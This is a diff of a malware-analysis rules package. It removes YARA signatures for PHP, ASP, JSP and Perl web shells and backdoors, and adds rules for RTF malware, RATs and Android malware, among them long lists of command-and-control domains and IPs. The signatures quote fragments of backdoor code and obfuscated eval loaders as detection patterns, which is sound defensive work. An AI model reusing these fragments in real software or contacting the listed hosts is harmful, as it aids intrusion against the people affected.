-		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
-		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
-		$s3 = "value='Calistirmak istediginiz "
-	condition:
-		1 of them
-}
-rule small_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file small.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "fcee6226d09d150bfa5f103bee61fbde"
-	strings:
-		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
-		$s4 = "@ini_set('error_log',NULL);" fullword
-	condition:
-		2 of them
-}
-rule shellbot_pl {
-	meta:
-		description = "Semi-Auto-generated  - file shellbot.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
-	strings:
-		$s0 = "ShellBOT"
-		$s1 = "PacktsGr0up"
-		$s2 = "CoRpOrAtIoN"
-		$s3 = "# Servidor de irc que vai ser usado "
-		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
-	condition:
-		2 of them
-}
-rule fuckphpshell_php {
-	meta:
-		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "554e50c1265bb0934fcc8247ec3b9052"
-	strings:
-		$s0 = "$succ = \"Warning! "
-		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
-		$s2 = "\\*=-- MEMBERS AREA --=*/"
-		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
-	condition:
-		2 of them
-}
-rule ngh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file ngh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
-	strings:
-		$s0 = "Cr4sh_aka_RKL"
-		$s1 = "NGH edition"
-		$s2 = "/* connectback-backdoor on perl"
-		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
-		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
-	condition:
-		1 of them
-}
-rule jsp_reverse_jsp {
-	meta:
-		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8b0e6779f25a17f0ffb3df14122ba594"
-	strings:
-		$s0 = "// backdoor.jsp"
-		$s1 = "JSP Backdoor Reverse Shell" 
-		$s2 = "http://michaeldaw.org" 
-	condition:
-		1 of them
-}
-rule Tool_asp {
-	meta:
-		description = "Semi-Auto-generated  - file Tool.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
-	strings:
-		$s0 = "mailto:rhfactor@antisocial.com"
-		$s2 = "?raiz=root"
-		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
-		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
-	condition:
-		2 of them
-}
-rule NT_Addy_asp {
-	meta:
-		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
-	strings:
-		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
-		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
-		$s4 = "RAW D.O.S. COMMAND INTERFACE"
-	condition:
-		1 of them
-}
-rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
-	meta:
-		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-	strings:
-		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
-		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
-		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
-	condition:
-		1 of them
-}
-rule RemExp_asp {
-	meta:
-		description = "Semi-Auto-generated  - file RemExp.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
-	strings:
-		$s0 = "<title>Remote Explorer</title>"
-		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
-		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
-	condition:
-		2 of them
-}
-rule phvayvv_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "35fb37f3c806718545d97c6559abd262"
-	strings:
-		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
-		$s1 = "$baglan=fopen($duzkaydet,'w');"
-		$s2 = "PHVayv 1.0"
-	condition:
-		1 of them
-}
-rule klasvayv_asp {
-	meta:
-		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
-	strings:
-		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
-		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
-		$s3 = "<font color=\"#858585\">www.aventgrup.net"
-		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
-	condition:
-		1 of them
-}
-rule r57shell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "d28445de424594a5f14d0fe2a7c4e94f"
-	strings:
-		$s0 = "r57shell" fullword 
-		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
-		$s2 = "RusH security team"
-		$s3 = "'ru_text12' => 'back-connect"
-	condition:
-		1 of them
-}
-rule rst_sql_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "0961641a4ab2b8cb4d2beca593a92010"
-	strings:
-		$s0 = "C:\\tmp\\dump_"
-		$s1 = "RST MySQL"
-		$s2 = "http://rst.void.ru"
-		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
-	condition:
-		2 of them
-}
-rule wh_bindshell_py {
-	meta:
-		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "fab20902862736e24aaae275af5e049c"
-	strings:
-		$s0 = "#Use: python wh_bindshell.py [port] [password]"
-		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
-		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
-	condition:
-		1 of them
-}
-rule lurm_safemod_on_cgi {
-	meta:
-		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5ea4f901ce1abdf20870c214b3231db3"
-	strings:
-		$s0 = "Network security team :: CGI Shell" fullword
-		$s1 = "#########################<<KONEC>>#####################################" fullword
-		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
-	condition:
-		1 of them
-}
-rule c99madshell_v2_0_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "d27292895da9afa5b60b9d3014f39294"
-	strings:
-		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
-	condition:
-		all of them
-}
-rule backupsql_php_often_with_c99shell {
-	meta:
-		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
-	strings:
-		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
-		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
-	condition:
-		all of them
-}
-rule uploader_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file uploader.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "0b53b67bb3b004a8681e1458dd1895d0"
-	strings:
-		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
-		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
-		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
-	condition:
-		2 of them
-}
-rule telnet_pl {
-	meta:
-		description = "Semi-Auto-generated  - file telnet.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "dd9dba14383064e219e29396e242c1ec"
-	strings:
-		$s0 = "W A R N I N G: Private Server"
-		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
-	condition:
-		all of them
-}
-rule w3d_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file w3d.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "987f66b29bfb209a0b4f097f84f57c3b"
-	strings:
-		$s0 = "W3D Shell"
-		$s1 = "By: Warpboy"
-		$s2 = "No Query Executed"
-	condition:
-		2 of them
-}
-
-
-rule rtf_yahoo_ken
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "Yahoo Ken"
-	filetype = "RTF"
-	version = "0.1"
-	description = "Test rule"
-	date = "2013-12-14"
-strings:
-	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
-	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
-	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
-	$author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
-condition:
-	($magic1 or $magic2 or $magic3 at 0) and $author1
-} 
-
-
-rule ZXProxy
-{
-meta:
-	author = "ThreatConnect Intelligence Research Team"
-	
-strings:
-	$C = "\\Control\\zxplug" nocase wide ascii
-	$h = "http://www.facebook.com/comment/update.exe" wide ascii
-	$S = "Shared a shell to %s:%s Successfully" nocase wide ascii
-condition:
-	any of them
-}
-
-rule OrcaRAT
-{
-    meta:
-        Author      = "PwC Cyber Threat Operations"
-        Date        = "2014/10/20" 
-        Description = "Strings inside"
-        Reference   = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
-
-    strings:
-        $MZ = "MZ"
-        $apptype1 = "application/x-ms-application"
-        $apptype2 = "application/x-ms-xbap"
-        $apptype3 = "application/vnd.ms-xpsdocument"
-        $apptype4 = "application/xaml+xml"
-        $apptype5 = "application/x-shockwave-flash"
-        $apptype6 = "image/pjpeg"
-        $err1 = "Set return time error =   %d!"
-        $err2 = "Set return time   success!"
-        $err3 = "Quit success!"
-
-    condition:
-        $MZ at 0 and filesize < 500KB and (all of ($apptype*) and 1 of ($err*))
-}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Amtrckr_20160519.yar remnux-rules-0.0.4/yara/Mobile_Malware/Amtrckr_20160519.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Amtrckr_20160519.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Amtrckr_20160519.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,619 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "androguard"
+// More info: http://amtrckr.info/
+// Last update: 2016/05/19 - 10:00:02
+
+
+rule coudw: amtrckr
+{
+	meta:
+		family = "coudw"
+
+	condition:
+		androguard.url(/s\.cloudsota\.com/)
+}
+
+rule z3core: amtrckr
+{
+	meta:
+		family = "z3core"
+
+	condition:
+		androguard.url(/lexsmilefux\.link/)
+}
+
+rule gtalocker: amtrckr
+{
+	meta:
+		family = "gtalocker"
+
+	condition:
+		androguard.url(/niktoegoneyznaet0kol\.pw/)
+}
+
+rule marcher: amtrckr
+{
+	meta:
+		family = "marcher"
+
+	condition:
+		androguard.url(/104\.238\.176\.9/) or 
+		androguard.url(/golioni\.tk/) or 
+		androguard.url(/poloclubs\.tk/) or 
+		androguard.url(/thejcb\.ru/) or 
+		androguard.url(/shgt\.tk/) or 
+		androguard.url(/pologt\.tk/) or 
+		androguard.url(/108\.61\.211\.219/) or 
+		androguard.url(/vipcoon\.com/) or 
+		androguard.url(/firenzonne\.com/) or 
+		androguard.url(/extgta\.tk/) or 
+		androguard.url(/manaclubs\.tk/) or 
+		androguard.url(/151\.248\.126\.183/) or 
+		androguard.url(/188\.209\.49\.198/)
+}
+
+rule lenovo_reaper: amtrckr
+{
+	meta:
+		family = "lenovo_reaper"
+
+	condition:
+		androguard.url(/uefsr\.lenovomm\.com/)
+}
+
+rule unknown_1: amtrckr
+{
+	meta:
+		family = "unknown"
+
+	condition:
+		androguard.url(/222\.76\.213\.20/) or 
+		androguard.url(/103\.38\.42\.236/) or 
+		androguard.url(/103\.243\.181\.41/) or 
+		androguard.url(/123\.1\.157\.4/)
+}
+
+rule jagonca: amtrckr
+{
+	meta:
+		family = "jagonca"
+
+	condition:
+		androguard.url(/abra-k0dabra\.com/) or 
+		androguard.url(/heibe-titten\.com/)
+}
+
+rule thoughtcrime: amtrckr
+{
+	meta:
+		family = "thoughtcrime"
+
+	condition:
+		androguard.url(/losbalonazos\.com/) or 
+		androguard.url(/www\.oguhtell\.ch/) or 
+		androguard.url(/szaivert-numis\.at/) or 
+		androguard.url(/edda-mally\.at/) or 
+		androguard.url(/clubk-ginza\.net/)
+}
+
+rule slocker: amtrckr
+{
+	meta:
+		family = "slocker"
+
+	condition:
+		androguard.url(/aerofigg\.org/)
+}
+
+rule infostealer: amtrckr
+{
+	meta:
+		family = "infostealer"
+
+	condition:
+		androguard.url(/koko02\.ru/)
+}
+
+rule pornlocker: amtrckr
+{
+	meta:
+		family = "pornlocker"
+
+	condition:
+		androguard.url(/playmarketcheck\.com/) or 
+		androguard.url(/pornigy\.biz/)
+}
+
+rule droidian: amtrckr
+{
+	meta:
+		family = "droidian"
+
+	condition:
+		androguard.url(/z0\.tkurd\.net/)
+}
+
+rule androrat: amtrckr
+{
+	meta:
+		family = "androrat"
+
+	condition:
+		androguard.url(/toyman6699\.no-ip\.info/) or 
+		androguard.url(/aerror\.no-ip\.biz/) or 
+		androguard.url(/androrat\.servegame\.com/) or 
+		androguard.url(/197\.35\.22\.37/) or 
+		androguard.url(/androrat1\.no-ip\.biz/) or 
+		androguard.url(/151\.72\.17\.61/) or 
+		androguard.url(/qwerty1212\.ddns\.net/) or 
+		androguard.url(/recycled\.no-ip\.org/) or 
+		androguard.url(/gert44\.duckdns\.org/) or 
+		androguard.url(/78\.169\.63\.163/) or 
+		androguard.url(/hash0r\.no-ip\.biz/) or 
+		androguard.url(/alpheron\.duckdns\.org/) or 
+		androguard.url(/cricbot\.no-ip\.info/) or 
+		androguard.url(/hazhar77\.no-ip\.biz/) or 
+		androguard.url(/aleem\.top7@gmail\.com/) or 
+		androguard.url(/murryapplicazione\.no-ip\.org/) or 
+		androguard.url(/helloandroid\.no-ip\.org/) or 
+		androguard.url(/79\.170\.54\.154/) or 
+		androguard.url(/mohammad2002\.no-ip\.biz/) or 
+		androguard.url(/1756mostacc\.ddns\.net/) or 
+		androguard.url(/shakaky\.ddns\.net/) or 
+		androguard.url(/asadhashmi\.ddns\.net/) or 
+		androguard.url(/174\.127\.99\.232/) or 
+		androguard.url(/109\.95\.56\.22/) or 
+		androguard.url(/dagohack\.no-ip\.me/) or 
+		androguard.url(/pruebasernesto\.ddns\.net/) or 
+		androguard.url(/zola123\.no-ip\.biz/) or 
+		androguard.url(/mikestar\.no-ip\.biz/) or 
+		androguard.url(/132\.72\.81\.164/) or 
+		androguard.url(/zongkahani\.no-ip\.biz/) or 
+		androguard.url(/florian-pc\.ksueyuj0mtxpt6gn\.myfritz\.net/) or 
+		androguard.url(/kontolanime\.no-ip\.biz/) or 
+		androguard.url(/41\.143\.69\.230/) or 
+		androguard.url(/gentel901\.no-ip\.org/) or 
+		androguard.url(/anonimousdre180\.ddns\.net/) or 
+		androguard.url(/sajadianh\.ddns\.net/) or 
+		androguard.url(/195\.2\.239\.147/) or 
+		androguard.url(/vipmustafa\.no-ip\.info/) or 
+		androguard.url(/alihoseini\.no-ip\.biz/) or 
+		androguard.url(/aymen1852\.ddns\.net/) or 
+		androguard.url(/danialmostafaei\.no-ip\.biz/) or 
+		androguard.url(/100\.1\.254\.38/) or 
+		androguard.url(/sabbah\.duckdns\.org/) or 
+		androguard.url(/89\.95\.11\.159/) or 
+		androguard.url(/telegram-tools\.no-ip\.biz/) or 
+		androguard.url(/myonline\.no-ip\.biz/) or 
+		androguard.url(/84\.241\.6\.106/) or 
+		androguard.url(/linonymousami\.no-ip\.org/) or 
+		androguard.url(/alldebrid\.duckdns\.org/) or 
+		androguard.url(/187\.180\.186\.181/) or 
+		androguard.url(/411022356/) or 
+		androguard.url(/93\.82\.129\.5/) or 
+		androguard.url(/androjan\.ddns\.net/) or 
+		androguard.url(/adelxxbx\.no-ip\.biz/) or 
+		androguard.url(/r3cxw\.ddns\.net/) or 
+		androguard.url(/matgio\.duckdns\.org/) or 
+		androguard.url(/glaive24\.no-ip\.biz/) or 
+		androguard.url(/redcode\.ddns\.net/) or 
+		androguard.url(/151\.56\.227\.79/) or 
+		androguard.url(/shahabhacker\.ddns\.net/) or 
+		androguard.url(/186\.81\.50\.145/) or 
+		androguard.url(/kasofe123123aa\.no-ip\.biz/) or 
+		androguard.url(/tanha\.sit@gmail\.com/) or 
+		androguard.url(/persir\.no-ip\.biz/) or 
+		androguard.url(/moha55\.no-ip\.biz/) or 
+		androguard.url(/androidupdate\.ddns\.net/) or 
+		androguard.url(/charifo1310tok\.no-ip\.biz/) or 
+		androguard.url(/securepurpose\.no-ip\.info/) or 
+		androguard.url(/vpn0\.ddns\.net/) or 
+		androguard.url(/usa20002015\.ddns\.net/) or 
+		androguard.url(/duyguseliberkay\.no-ip\.biz/) or 
+		androguard.url(/miltin2\.no-ip\.org/) or 
+		androguard.url(/droidjack228\.ddns\.net/) or 
+		androguard.url(/mjhooollltuuu\.no-ip\.biz/) or 
+		androguard.url(/nexmopro830\.ddns\.net/) or 
+		androguard.url(/rustyash\.no-ip\.biz/) or 
+		androguard.url(/atsizinoglu\.duckdns\.org/) or 
+		androguard.url(/goog2\.no-ip\.biz/) or 
+		androguard.url(/testan\.ddns\.net/) or 
+		androguard.url(/androrat\.zapto\.org/) or 
+		androguard.url(/blackghostdc\.duckdns\.org/) or 
+		androguard.url(/191\.239\.107\.56/) or 
+		androguard.url(/kalinne\.ddns\.net/) or 
+		androguard.url(/hackcam\.zapto\.org/) or 
+		androguard.url(/andro0161\.no-ip\.info/) or 
+		androguard.url(/replace\.duckdns\.org/) or 
+		androguard.url(/46\.223\.99\.222/) or 
+		androguard.url(/karasqlee9\.no-ip\.org/) or 
+		androguard.url(/kalizinho\.no-ip\.org/) or 
+		androguard.url(/141\.255\.144\.72/) or 
+		androguard.url(/84\.101\.0\.49/) or 
+		androguard.url(/msupdate\.myvnc\.com/) or 
+		androguard.url(/zal75zk\.ddns\.net/) or 
+		androguard.url(/nassahsliman\.ddns\.net/) or 
+		androguard.url(/mohsenfaz\.ddns\.net/) or 
+		androguard.url(/saiber-far68\.ddns\.net/) or 
+		androguard.url(/106\.219\.57\.228/) or 
+		androguard.url(/android\.no-ip\.org/) or 
+		androguard.url(/161\.202\.108\.108/) or 
+		androguard.url(/hamker\.ddns\.net/) or 
+		androguard.url(/92\.243\.68\.167/) or 
+		androguard.url(/vikas\.no-ip\.biz/) or 
+		androguard.url(/68\.189\.1\.254/) or 
+		androguard.url(/bmt96\.noip\.me/) or 
+		androguard.url(/newxor2\.no-ip\.org/) or 
+		androguard.url(/2\.190\.167\.83/) or 
+		androguard.url(/hackme\.no-ip\.org/) or 
+		androguard.url(/mohammedwasib\.ddns\.net/) or 
+		androguard.url(/24\.172\.28\.155/) or 
+		androguard.url(/120\.0\.0\.1/) or 
+		androguard.url(/simbabweratte\.hopto\.org/) or 
+		androguard.url(/androrat143\.no-ip\.biz/) or 
+		androguard.url(/222\.168\.1\.2/) or 
+		androguard.url(/189\.174\.125\.60/) or 
+		androguard.url(/suckmordecock\.duckdns\.org/) or 
+		androguard.url(/201\.124\.95\.7/) or 
+		androguard.url(/svn-01\.ddns\.net/) or 
+		androguard.url(/jNkey\.ddns\.net/) or 
+		androguard.url(/131\.117\.235\.35/) or 
+		androguard.url(/justarat\.noip\.me/) or 
+		androguard.url(/dangerlove\.no-ip\.biz/) or 
+		androguard.url(/bahoom\.no-ip\.biz/) or 
+		androguard.url(/183\.82\.99\.133/) or 
+		androguard.url(/hatam\.no-ip\.org/) or 
+		androguard.url(/37\.239\.8\.89/) or 
+		androguard.url(/c1\.no-ip\.biz/) or 
+		androguard.url(/samy777\.no-ip\.biz/) or 
+		androguard.url(/juanblackhak\.ddns\.net/) or 
+		androguard.url(/sherlockholmes\.duckdns\.org/) or 
+		androguard.url(/martin123456\.no-ip\.org/) or 
+		androguard.url(/androratbtas\.no-ip\.info/) or 
+		androguard.url(/servidor23\.ddns\.net/) or 
+		androguard.url(/xyz2145\.ddns\.net/) or 
+		androguard.url(/war10ck\.serveftp\.com/) or 
+		androguard.url(/androrat1226\.ddns\.net/) or 
+		androguard.url(/anonsa\.ddns\.net/) or 
+		androguard.url(/dogecoinspeed\.zapto\.org/) or 
+		androguard.url(/61\.131\.121\.195/) or 
+		androguard.url(/invisibleghost\.no-ip\.biz/) or 
+		androguard.url(/elgen1\.no-ip\.biz/) or 
+		androguard.url(/habbo\.no-ip\.org/) or 
+		androguard.url(/thekillers\.ddns\.net/) or 
+		androguard.url(/94\.212\.118\.115/) or 
+		androguard.url(/41\.38\.56\.81/) or 
+		androguard.url(/misty255\.no-ip\.org/) or 
+		androguard.url(/volnado\.sytes\.net/) or 
+		androguard.url(/haiderhacer12\.no-ip\.biz/) or 
+		androguard.url(/asosha4ed\.no-ip\.biz/) or 
+		androguard.url(/losever2\.no-ip\.biz/) or 
+		androguard.url(/80\.136\.103\.51/) or 
+		androguard.url(/drrazikhan\.no-ip\.info/) or 
+		androguard.url(/makarand\.no-ip\.org/) or 
+		androguard.url(/isamdonita\.no-ip\.org/) or 
+		androguard.url(/anagliz\.ddns\.net/)
+}
+
+rule sandrorat: amtrckr
+{
+	meta:
+		family = "sandrorat"
+
+	condition:
+		androguard.url(/tak\.no-ip\.info/) or 
+		androguard.url(/maskaralama\.ddns\.net/) or 
+		androguard.url(/sondres1\.ddns\.net/) or 
+		androguard.url(/toyman6699\.no-ip\.info/) or 
+		androguard.url(/appmarket\.servehttp\.com/) or 
+		androguard.url(/31\.210\.117\.132/) or 
+		androguard.url(/freeann\.sytes\.net/) or 
+		androguard.url(/changyu231\.ddns\.net/) or 
+		androguard.url(/mohammed22468\.no-ip\.biz/) or 
+		androguard.url(/oneriakosa\.ddns\.net/) or 
+		androguard.url(/46\.186\.155\.219/) or 
+		androguard.url(/jockerhackerxnxx\.ddns\.net/) or 
+		androguard.url(/41\.251\.251\.7/) or 
+		androguard.url(/megalol\.chickenkiller\.com/) or 
+		androguard.url(/188\.166\.76\.144/) or 
+		androguard.url(/injectman\.no-ip\.info/) or 
+		androguard.url(/aasxzxdsc12324\.no-ip\.biz/) or 
+		androguard.url(/magemankoktelam\.ddns\.net/) or 
+		androguard.url(/alfazaai99\.ddns\.net/) or 
+		androguard.url(/dantehack\.zapto\.org/) or 
+		androguard.url(/droidjack1\.sytes\.net/) or 
+		androguard.url(/th3expert\.3utilities\.com/) or 
+		androguard.url(/mohamed46565656\.no-ip\.biz/) or 
+		androguard.url(/chrisfo\.no-ip\.org/) or 
+		androguard.url(/hazhar77\.no-ip\.biz/) or 
+		androguard.url(/31\.146\.202\.169/) or 
+		androguard.url(/njesra\.ddns\.net/) or 
+		androguard.url(/yorkiepet\.ddns\.net/) or 
+		androguard.url(/mrgnet\.ddns\.net/) or 
+		androguard.url(/droy\.zapto\.org/) or 
+		androguard.url(/93\.104\.213\.217/) or 
+		androguard.url(/amarok58\.no-ip\.biz/) or 
+		androguard.url(/server4update\.serveftp\.com/) or 
+		androguard.url(/zaliminxx\.duckdns\.org/) or 
+		androguard.url(/anonymo9s\.ddns\.net/) or 
+		androguard.url(/htmp\.sytes\.net/) or 
+		androguard.url(/khalid-2016\.noip\.me/) or 
+		androguard.url(/mahasiswa\.no-ip\.biz/) or 
+		androguard.url(/mamal9921\.ddns\.net/) or 
+		androguard.url(/kaddress\.ddns\.net/) or 
+		androguard.url(/sharmayash\.no-ip\.biz/) or 
+		androguard.url(/RATForAndroid\.ddns\.net/) or 
+		androguard.url(/shabbushah\.duckdns\.org/) or 
+		androguard.url(/osammer0asmam3a\.ddns\.net/) or 
+		androguard.url(/themayhen23\.no-ip\.org/) or 
+		androguard.url(/wxf2009817\.f3322\.net/) or 
+		androguard.url(/miioolinase\.ddns\.net/) or 
+		androguard.url(/motoshi\.zapto\.org/) or 
+		androguard.url(/88\.150\.149\.91/) or 
+		androguard.url(/info\.bounceme\.net/) or 
+		androguard.url(/samira\.no-ip\.biz/) or 
+		androguard.url(/31\.210\.69\.156/) or 
+		androguard.url(/93\.79\.212\.194/) or 
+		androguard.url(/futurasky\.no-ip\.biz/) or 
+		androguard.url(/rat\.capsulelab\.us/) or 
+		androguard.url(/fruby\.zapto\.org/) or 
+		androguard.url(/iraqn6777\.ddns\.net/) or 
+		androguard.url(/samsung\.apps\.linkpc\.net/) or 
+		androguard.url(/eldiablo\.no-ip\.biz/) or 
+		androguard.url(/system32\.com/) or 
+		androguard.url(/haker33sadekgafer\.no-ip\.biz/) or 
+		androguard.url(/droidjack258\.bounceme\.net/) or 
+		androguard.url(/cardangi\.no-ip\.org/) or 
+		androguard.url(/fazoro66\.ddns\.net/) or 
+		androguard.url(/androidalbums\.ddns\.net/) or 
+		androguard.url(/tedy1993\.ddns\.net/) or 
+		androguard.url(/109\.73\.68\.114/) or 
+		androguard.url(/alaa-1982\.no-ip\.biz/) or 
+		androguard.url(/facrbook\.redirectme\.net/) or 
+		androguard.url(/androidan\.ddns\.net/) or 
+		androguard.url(/learnxea\.duckdns\.org/) or 
+		androguard.url(/audreysaradin\.no-ip\.org/) or 
+		androguard.url(/178\.124\.182\.38/) or 
+		androguard.url(/mobiles0ft\.no-ip\.org/) or 
+		androguard.url(/cybercrysis\.ddns\.net/) or 
+		androguard.url(/playstore\.ddns\.net/) or 
+		androguard.url(/blind1234\.ddns\.net/) or 
+		androguard.url(/chanks\.no-ip\.biz/) or 
+		androguard.url(/lomo\.com/) or 
+		androguard.url(/ayadd19\.no-ip\.org/) or 
+		androguard.url(/bitoandroid\.no-ip\.info/) or 
+		androguard.url(/androidtool\.ddns\.net/) or 
+		androguard.url(/authd\.ddns\.net/) or 
+		androguard.url(/carapuce-2015\.no-ip\.biz/) or 
+		androguard.url(/aliyusef6\.no-ip\.biz/) or 
+		androguard.url(/bannding\.ddns\.net/) or 
+		androguard.url(/momen-swesi\.no-ip\.biz/) or 
+		androguard.url(/wogusnb\.no-ip\.info/) or 
+		androguard.url(/noussa\.no-ip\.biz/) or 
+		androguard.url(/droidjackv5\.ddns\.net/) or 
+		androguard.url(/alanbkey\.no-ip\.org/) or 
+		androguard.url(/androidrat21\.ddns\.net/) or 
+		androguard.url(/diceedicee\.ddns\.net/) or 
+		androguard.url(/178\.20\.230\.44/) or 
+		androguard.url(/strateg\.ddns\.net/) or 
+		androguard.url(/hasn9999\.ddns\.net/) or 
+		androguard.url(/anonymousip\.no-ip\.org/) or 
+		androguard.url(/fucks\.ddns\.net/) or 
+		androguard.url(/shahidsajan\.no-ip\.biz/) or 
+		androguard.url(/spicymemes\.duckdns\.org/) or 
+		androguard.url(/hackermoqtada\.no-ip\.biz/) or 
+		androguard.url(/andro\.no-ip\.biz/) or 
+		androguard.url(/goggle\.sytes\.net/) or 
+		androguard.url(/anonymous666\.zapto\.org/) or 
+		androguard.url(/dnsdynamic\.org/) or 
+		androguard.url(/jomo\.zapto\.org/) or 
+		androguard.url(/adobflash\.hopto\.org/) or 
+		androguard.url(/iqram85spy\.ddns\.net/) or 
+		androguard.url(/moussa-hak\.no-ip\.biz/) or 
+		androguard.url(/williettinger\.cc/) or 
+		androguard.url(/usa2222\.ddns\.net/) or 
+		androguard.url(/22134520\.ddns\.net/) or 
+		androguard.url(/android1\.ddns\.net/) or 
